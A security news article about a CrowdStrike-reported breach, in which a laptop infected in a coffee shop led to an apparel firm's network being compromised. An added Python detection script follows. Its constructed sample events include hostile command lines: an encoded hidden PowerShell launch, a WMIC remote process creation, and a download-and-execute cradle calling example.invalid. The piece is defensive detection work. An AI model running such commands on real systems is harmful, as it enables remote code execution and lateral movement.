One Hacked Laptop Can Compromise a Network
If one laptop is hacked, it will likely lead to more. It can even compromise a company’s entire network. At least it did in the case of one worker who clicked on the wrong link at the wrong time. One click resulted in a major security breach.
A cybersecurity firm, CrowdStrike, sent out its Cyber Intrusion Services Casebook 2018 report as a reminder that laptops and other devices should be used within a secure network. Devices used in a public area or on an unsecured network can leave an organization exposed.
What exactly happened?
One person using a corporate laptop in a coffee shop got hacked. This was enough to allow a cybercrime group, later identified as Indrik Spider, to compromise an organization’s entire infrastructure.
- The employee visited one of the firm’s partners’ websites. A phishing email directed the user to the site.
- The site that the user went to was compromised by FakeUpdates, a malware and social engineering campaign affecting thousands of Joomla and WordPress sites. This malware shows users pop-ups telling them that their browser software needs updating.
- The malware then infected the laptop with the Dridex banking trojan and the PowerShell Empire post-exploit toolset.
Unfortunately, the employee’s company security software relied on devices being inside the corporate network to pick up on any threats. However, since the laptop was used during the weekend and outside of the secured system, the company did not detect the breach until the computer was back in the office.
By that time, it was too late. The attackers were able to install Framework POS malware on the retail store server to steal credit card data.
Who were the attackers?
The culprits are known as Indrik Spider. Their hacking operation has been active since 2014 and is heavily associated with Dridex and BitPaymer ransomware campaigns. These malware campaigns have netted the attackers millions of dollars.
There is an indication that this cybercrime group is expanding their operations since this is the first time they have been associated with FakeUpdates.
Who did this attack affect?
CrowdStrike did not name the company. However, it was noted as an apparel manufacturer “with an extensive global presence, including retail locations.”
They didn’t disclose if the attack was successful in stealing credit card data either. Their report is a lesson to companies so that they can avoid falling victim to similar campaigns.
How can users and companies avoid malware campaigns?
Malware affects both individual users and companies. Some Internet Service Providers (ISPs) are working with vendors to build proactive security into their networks (like Actiontec’s Optim platform). These efforts can safeguard homes, families and businesses by blocking users from visiting harmful webpages or protecting against other cybersecurity threats.
CrowdStrike recommends segregating accounts, and not giving end users administrator privileges on their local systems.
The cybersecurity firm stated that “attackers used PowerShell or Windows Management Instrumentation in 20 percent of the cases” that they saw this year.
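The report’s point about PowerShell and WMI is only useful if a company actually evaluates endpoint telemetry for those tools. The following script is an added example, not code from the article or from CrowdStrike: it runs a few defender-side detection rules over constructed Windows event records (process-creation events with the ID 4688 and PowerShell script-block events with the ID 4104). The field names, hosts and command lines are all constructed for illustration.

```python
"""Added example: flag common PowerShell / WMI abuse patterns in endpoint telemetry.

The events below are constructed samples modelled loosely on Windows event fields;
they are not taken from the CrowdStrike casebook.
"""
import re

# Constructed sample events (hypothetical hosts and command lines).
SAMPLE_EVENTS = [
    {"event_id": 4688, "host": "LAPTOP-01",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA"},
    {"event_id": 4688, "host": "LAPTOP-01",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "command_line": 'wmic /node:STORE-SRV-01 process call create "cmd.exe /c whoami"'},
    {"event_id": 4104, "host": "LAPTOP-01",
     "script_block": "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/u.ps1')"},
    {"event_id": 4688, "host": "DESK-07",  # benign scheduled script: must not be flagged
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\nightly-backup.ps1"},
]

# Each rule: (name, event ID it applies to, field to inspect, pattern).
RULES = [
    # Base64-encoded command passed on the PowerShell command line.
    ("powershell_encoded_command", 4688, "command_line",
     re.compile(r"(?i)powershell(?:\.exe)?\b.*\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")),
    # PowerShell started with a hidden window, which interactive users rarely do.
    ("powershell_hidden_window", 4688, "command_line",
     re.compile(r"(?i)powershell(?:\.exe)?\b.*\s-w(?:indowstyle)?\s+hidden\b")),
    # WMIC used to create a process on a remote host (lateral movement pattern).
    ("wmi_remote_process_create", 4688, "command_line",
     re.compile(r"(?i)\bwmic(?:\.exe)?\s+.*?/node:\S+.*\bprocess\s+call\s+create\b")),
    # Script block that downloads content and immediately executes it.
    ("powershell_download_cradle", 4104, "script_block",
     re.compile(r"(?i)\b(?:iex|invoke-expression)\b.*\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b")),
]


def evaluate(event):
    """Return the names of all rules that match a single event (empty list if none)."""
    hits = []
    for name, event_id, field, pattern in RULES:
        if event.get("event_id") == event_id and pattern.search(event.get(field, "")):
            hits.append(name)
    return hits


def scan(events):
    """Evaluate every event and return (host, event_id, rule) findings in input order."""
    findings = []
    for ev in events:
        for rule in evaluate(ev):
            findings.append((ev["host"], ev["event_id"], rule))
    return findings


def hosts_with_findings(events):
    """Sorted list of hosts that produced at least one finding."""
    return sorted({host for host, _, _ in scan(events)})


if __name__ == "__main__":
    for host, event_id, rule in scan(SAMPLE_EVENTS):
        print(f"{host}\tevent {event_id}\t{rule}")
    print("hosts to triage:", hosts_with_findings(SAMPLE_EVENTS))
```

The rules are deliberately narrow so that an administrator’s `-File` invocation of a nightly script is not flagged while encoded, hidden or download-and-execute invocations are. The more important design point, given the detection gap described earlier in the article, is that the rules run on event records collected from the endpoint itself: if that telemetry is forwarded from the device rather than captured by sensors on the corporate network, activity from a weekend in a coffee shop is evaluated as soon as the logs arrive instead of going unnoticed until the laptop is back in the office.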
Ultimately, the way to avoid these attacks is by being aware of them. “Businesses need to know how to better detect and protect against these [attacks],” said Bryan York, director of professional services at Crowdstrike.